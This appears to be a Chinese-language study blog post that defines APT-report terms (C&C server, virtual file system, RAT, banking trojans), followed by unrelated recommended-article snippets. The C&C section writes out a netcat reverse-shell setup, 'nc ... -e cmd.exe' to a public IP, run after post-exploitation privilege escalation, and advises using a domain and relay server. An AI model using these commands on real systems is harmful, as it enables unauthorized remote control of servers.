浏览 APT 报告中学习积累
浏览 APT 报告中学习积累
工具网站积累:(APT 报告搜寻网站)
https://ti.qianxin.com/
https://feed.watcherlab.com/index/apt
https://malpedia.caad.fkie.fraunhofer.de/
专业词积累
C&C 服务器
参考链接: https://cloud.tencent.com/developer/article/1180887
通常我们在做渗透测试的时候,在拿到一个 webshell 的时候,我们需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令,而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要我们将系统权限的 cmd shell 反弹回本地。
这里我们使用 nc 在本地执行:
nc -vv -lp 3333
上述命令的意思是在本地监听一个 3333 端口等待连接,假设你的电脑 IP 是公网的,并且 IP 为 114.114.114.114。
然后在目标服务器就可以执行:
nc 114.114.114.114 3333 -e cmd.exe
上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回给你,这时你的本机电脑就是一个简易的 C&C 服务器。
如图简单的解释上面的过程:
如果你的本机电脑是在内网中,没有公网 IP,目标服务器也在内网,这时目标不能直接通过 IP 地址连接到你本机,此时我们则需要一台公网服务器做中转了。
再延伸一下,由于 IP 地址是随着中转服务器的变化而变化的,每次 IP 的 变化都会导致整个过程都要重新操作一次,每个命令语句都要进行修改,那么我们就可以将上面语句中的 IP 地址修改为我们注册的域名,然后将域名解析到我们的中转服务器,这样即使我们更换了中转服务器,我们也不需要更改执行过的命令。
虚拟文件系统:
参考链接:
https://baike.baidu.com/item/%E8%99%9A%E6%8B%9F%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F/10986803?fr=aladdin
虚拟文件系统 (VFS) 是由 Sun microsystems 公司在定义网络文件系统 (NFS) 时创造的。它是一种用于网络环境的分布式文件系统,是允许和操作系统使用不同的文件系统实现的接口。虚拟文件系统(VFS)是物理文件系统与服务之间的一个接口层,它对 Linux 的每个文件系统的所有细节进行抽象,使得不同的文件系统在 Linux 核心以及系统中运行的其他进程看来,都是相同的。严格说来,VFS 并不是一种实际的文件系统。它只存在于内存中,不存在于任何外存空间。VFS 在系统启动时建立,在系统关闭时消亡。
RAT 恶意软件
参考链接:
https://www.sysgeek.cn/what-rat-malware/
远程访问特洛伊木马(RAT,Remote Access Trojan)是一种恶意软件,能够让黑客监视和控制您的计算机、网络设备甚至整个网络。
银行木马
参考链接:
https://baike.baidu.com/item/%E9%93%B6%E8%A1%8C%E6%9C%A8%E9%A9%AC/15669586
恶意软件中最邪恶的一种,直接从你的银行账号中取走钱的银行木马。
第一代是在 2001 年之前的变种,作为普通后门,进驻用户 PC。接着黑客通过后门进入,并获得对用户信息的访问。
Stewart 记录的例子是 BackOrfice,第一次出现在 1998 年。
第二代银行木马针对性更强,预先打包,然后寻找所需信息、自动实施盗窃。
“bancos” 木马就是一个有许多变种的第二代的典型例子。据 Stewart 所言,变种数量和各种银行木马真正的名称都不容易确定,因为不同的反病毒公司对同样的病毒的命名是不一致的。
至于 Bancos,赛门铁克的数据库中就记载了 26 个不同名字的变种。
第三代银行木马事实上可以自动模拟用户行为。
Steward 说:第三代银行木马会偷走你的信息,然后从你的账户中取走钱。第三代银行木马是以 “Win32.Grams” 的出现开始的,时间是 2004 年。
浏览 APT 报告中学习积累相关推荐
- csdn开发者报告中学习到的新知识
哪里的人比较多 江苏的开发者还可以,和浙江差不多 不过主要的还是在广东和北京 大概薪资 哪里高薪资的最多呢? 北京的高薪资的多 跳槽这个事情,没想象的多 金融开发者高收入的相对比较多 开发者的环境要f ...
- 一份APT报告里有什么?
目前的APT报告出处非常集中,基本都出自几大知名安全厂商.因此,这些报告在例如风格.内容.结构上的差异非常鲜明.虽然一份APT报告的最终目的应该是通过来自长期对来自同一组织的攻击活动的监测,而对这一黑 ...
- 我们从工程项目中学习什么?
这个题目有点大,我在此仅限于技术层面. 这篇文章呢很早就想写,真正促使我付诸行动的是大约两个月前我开始给Mimas team讲街机模拟器的设计,大家普遍很漠然,大概完全搞不懂我为什么要讲这种东东 ...
- excel子表与母表筛选_滚动浏览Excel表中的筛选器项目
excel子表与母表筛选 To see specific data in an Excel Table, you can select an item from the drop down filte ...
- 浙大吴飞教授:尽管AlphaGo Zero已强大到从经验中学习模型,我也绝不赞同马斯克和霍金的威胁论,人才是智能的最终主宰
记者 | 鸽子 在整个采访过程中,吴飞教授在回答中给人的最大感受是温和.儒雅.他没有激烈的言辞,也没有犀利的观点,不会一开始直接抛出自己的判断,而是将所有的提问,看作是一次学术上的严谨探讨,从问题本身 ...
- 关于山东大学(威海)全向组海韵三队提交的 RT-Thread 技术报告中的若干疑点
简 介: 本文内容是在8月13日邮件接收到参加全国大学生智能车竞赛同学写来的一封邮件.其中对于公开的山东大学(威海)全向组提交的RT-Thread技术报告中所产生的若干疑点.针对于竞赛中所使用的沁恒单 ...
- 谷歌 Daydream 实验室:VR中学习新技能是一种怎样的体验?
谷歌 Daydream 实验室:VR中学习新技能是一种怎样的体验? 本文作者:逸炫 编辑:田苗 2017-07-26 10:56 导语:要学做一桌满汉全席,还是得撸起袖子下厨房. 雷锋网按:在VR中, ...
- 归纳+记忆:让机器像人一样从小样本中学习
作者|耿瑞莹,黎槟华,武玉川,李永彬 单位|阿里巴巴达摩院Conversational AI 团队 近年来,对话式 AI(Conversational AI)无论在学术界还是在工业界都在迅猛发展,背后 ...
- [网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进 ...
最新文章
- 用ext_skel,实现一个PHP扩展,添加到PHP并调用
- 在dw中如何调试html代码,如何在 Dreamweaver 中优化和调试代码 - Dreamweaver 用户指南...
- matlab基本运算与函数
- mysql2008r1_mysql8 参考手册-分区修剪
- 6-23 分离链接法的删除操作函数 (20 分)
- java线程统一_Java线程结果不一致
- 为了学习数据库索引,我们花了5000美元
- php form 上传_php+html5使用FormData对象提交表单及上传图片的方法
- [转]WebQQ登录过程分析
- 基于双目深度估计的深度学习技术研究
- 计算机本地网络如何共享,本地网络共享如何实现?
- 计算与推断思维 十六、比较两个样本
- 保持numlock处于开启状态
- 迅雷插件会导致IE8假死
- 32位CPU最多支持4G内存是怎么算出来的?(解惑篇)
- Windows或Linux中32位与64位操作系统的区别
- 最新web/java/jsp实现发送手机短信验证码和邮箱验证码的注册登录功能(详细)
- linux mysql 开发环境_RedHat Linux下QT平台MySQL数据库开发环境配置
- 导热系数常见测量方法
- 插上u盘显示格式化怎么办?